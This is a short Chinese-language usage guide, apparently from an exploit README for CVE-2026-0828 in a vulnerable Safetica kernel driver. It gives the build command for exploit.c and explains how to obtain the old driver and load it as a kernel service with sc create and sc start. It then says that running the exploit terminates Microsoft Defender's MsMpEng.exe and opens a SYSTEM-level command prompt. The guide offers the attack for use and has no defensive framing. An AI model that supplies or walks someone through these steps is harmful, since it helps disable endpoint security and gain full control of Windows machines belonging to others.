CVE-2026-0828 构建(Build):打开 Visual Studio 开发者命令行(x64 Native Tools)并编译代码
: bash
cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe
准备:确保测试机器上已安装易受攻击的 Safetica 驱动程序(ProcessMonitorDriver.sys)。如果没有,您需要自行获取(例如,从版本 < 11.26.19 的 Safetica 发行版中获取)
。
加载驱动程序(以管理员身份):驱动程序必须加载到系统中。这可以通过具有管理员权限的控制台完成
: bash
sc create STProcessMonitor type= kernel binPath= "C:\full\path\to\ProcessMonitorDriver.sys" sc start STProcessMonitor
运行漏洞利用程序:现在运行 exploit.exe。它将终止指定进程(代码中为 MsMpEng.exe)并打开一个具有 NT AUTHORITY\SYSTEM 权限的新 cmd.exe 窗口